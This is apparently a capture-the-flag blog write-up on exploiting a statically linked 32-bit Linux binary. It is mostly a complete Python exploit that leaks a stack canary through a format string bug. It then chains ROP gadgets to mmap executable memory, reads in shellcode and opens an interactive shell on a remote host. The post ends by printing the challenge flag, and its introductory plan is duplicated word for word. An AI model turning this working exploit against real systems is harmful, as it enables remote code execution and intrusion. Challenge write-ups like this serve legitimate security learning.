We got a statically linked linux 32-bit ELF with NX and stack canary. It had 2 vulnerabilities - format string and buffer overflow, which are easy to find. The idea of the exploit is below:
[*] Leak stack canary using format string vulnerability
[*] Overwrite saved EIP using buffer overflow and call mmap() to allocate memory with RWX permission
[*] Copy shellcode to newly allocated memory using read()
[*] Jump to the shellcode
Since the executable is statically linked we cannot make libc calls, but there is plenty of gadgets to make syscalls.
Here is the full exploit:
[*] Leak stack canary using format string vulnerability
[*] Overwrite saved EIP using buffer overflow and call mmap() to allocate memory with RWX permission
[*] Copy shellcode to newly allocated memory using read()
[*] Jump to the shellcode
Since the executable is statically linked we cannot make libc calls, but there is plenty of gadgets to make syscalls.
Here is the full exploit:
#!/usr/bin/env python import re import sys import time import struct import telnetlib import shellcode ip = "127.0.0.1" ip = "88.87.208.163" port = 7070 con = telnetlib.Telnet(ip, port) QUIT = "q" # leak canary using format string vuln con.write("%90$08x\n") time.sleep(1) t = con.read_very_eager() match = re.search("[a-f\d]{8}", t) if match: canary = struct.pack("<I", int(match.group(),16)) else: sys.exit(0) # overflow buffer payload = QUIT payload += "A" * 255 payload += canary payload += "A" * 12 # Setup for mmap() payload += struct.pack("<I", 0x080bee58) # pop eax ; ret payload += struct.pack("<I", 7) payload += struct.pack("<I", 0x0809df7c) # xchg eax, edx ; ret payload += struct.pack("<I", 0x080499f5) # pop esi ; ret payload += struct.pack("<I", 0x080d6080) # bss address payload += struct.pack("<I", 0x080cf0a2) # pop ecx ; or cl, byte [esi] ; or al, 0x43 ; ret payload += struct.pack("<I", 1024) payload += struct.pack("<I", 0x0808e0dc) # pop eax ; pop ebx ; pop ebp ; pop esi ; pop edi ; ret payload += struct.pack("<I", 0xc0) payload += struct.pack("<I", 0x0badc000) payload += struct.pack("<I", 0x0) payload += struct.pack("<I", 34) payload += struct.pack("<I", 0x0) payload += struct.pack("<I", 0x08061240) # int 0x80 ; ret # Setup for read() payload += struct.pack("<I", 0x080bee58) # pop eax ; ret payload += struct.pack("<I", 1024) payload += struct.pack("<I", 0x0809df7c) # xchg eax, edx ; ret payload += struct.pack("<I", 0x080499f5) # pop esi ; ret payload += struct.pack("<I", 0x080d6080) # bss address payload += struct.pack("<I", 0x080cf0a2) # pop ecx ; or cl, byte [esi] ; or al, 0x43 ; ret payload += struct.pack("<I", 0x0badc000) payload += struct.pack("<I", 0x080bee58) # pop eax ; ret payload += struct.pack("<I", 0x3) payload += struct.pack("<I", 0x08048139) # pop ebx ; ret payload += struct.pack("<I", 0x4) payload += struct.pack("<I", 0x08061240) # int 0x80 ; ret # Jump to shellcode payload += struct.pack("<I", 0x0badc000) con.write(payload + "\n") con.read_until("Bye\n") con.write(shellcode.DUP2 + shellcode.EXECVE + "\n") print "[*] Got shell" con.interact()Flag for the challenge is NcN_97740ead1060892a253be8ca33c6364a712b21d2
No comments:
Post a Comment